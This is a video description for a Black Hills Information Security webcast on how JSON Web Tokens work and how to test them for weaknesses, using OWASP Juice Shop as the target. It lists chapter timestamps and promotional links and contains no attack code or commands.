Modern Webapp Pentesting: How to Attack a JWT

Join us in the Black Hills InfoSec Discord server here: https://discord.gg/BHIS to keep the security conversation going! Learn modern webapp pentesting with BB King from Antisyphon Training: https://www.antisyphontraining.com/modern-webapp-pentesting-w-bb-king/ 00:00 - Good Morning! 01:50 - What Are JSON Web Tokens? 04:43 - Base64 Vs Base64 URL Encoding 07:58 - The Construction of a JSON Token 10:07 - Use Cases 13:03 - RFCs of Interest 13:26 - Encoded, Not Encrypted 19:58 - The Red Slide 20:39 - OWASP Top Ten Issues 21:01 - Signature Al Gore Rhythms 25:31 - Stanced On Privacy 26:53 - Stanced On Security 28:56 - Craking 30:20 - Where To Practice 34:58 - Decoding the Payload – DEMO 45:57 - Snooping ( Stealing Poorly-Protected Secrets ) 53:34 - For Further Study Description: In this Black Hills Information Security webcast - an excerpt from his upcoming 16-hour Modern Webapp Pentesting course - BB King will talk about what JSON Web Tokens are, why they're so controversial, and how to test for their major weaknesses. Then, using OWSAP's Juice Shop as a target, he'll show you a straightforward method for exploiting them that you can use on your own next webapp pentest. Slides for this webcast can be found here: https://www.blackhillsinfosec.com/wp-content/uploads/2020/09/SLIDES_WebApp_PenTesting_AttackingJWTs.pdf Black Hills Infosec Socials Twitter: https://twitter.com/BHinfoSecurity Mastodon: https://infosec.exchange/@blackhillsinfosec LinkedIn: https://www.linkedin.com/company/antisyphon-training Discord: https://discord.gg/ffzdt3WUDe Black Hills Infosec Shirts & Hoodies https://spearphish-general-store.myshopify.com/collections/bhis-shirt-collections Black Hills Infosec Services Active SOC: https://www.blackhillsinfosec.com/services/active-soc/ Penetration Testing: https://www.blackhillsinfosec.com/services/ Incident Response: https://www.blackhillsinfosec.com/services/incident-response/ Backdoors & Breaches - Incident Response Card Game Backdoors & Breaches: https://www.backdoorsandbreaches.com/ Play B&B Online: https://play.backdoorsandbreaches.com/ Antisyphon Training Pay What You Can: https://www.antisyphontraining.com/pay-what-you-can/ Live Training: https://www.antisyphontraining.com/course-catalog/ On Demand Training: https://www.antisyphontraining.com/on-demand-course-catalog/ Educational Infosec Content Black Hills Infosec Blogs: https://www.blackhillsinfosec.com/blog/ Wild West Hackin' Fest YouTube: https://www.youtube.com/wildwesthackinfest Active Countermeasures YouTube: https://youtube.com/activecountermeasures Antisyphon Training YouTube: https://www.youtube.com/antisyphontraining Join us at the annual information security conference in Deadwood, SD (in-person and virtually) — Wild West Hackin' Fest: https://wildwesthackinfest.com/ #bhis #infosec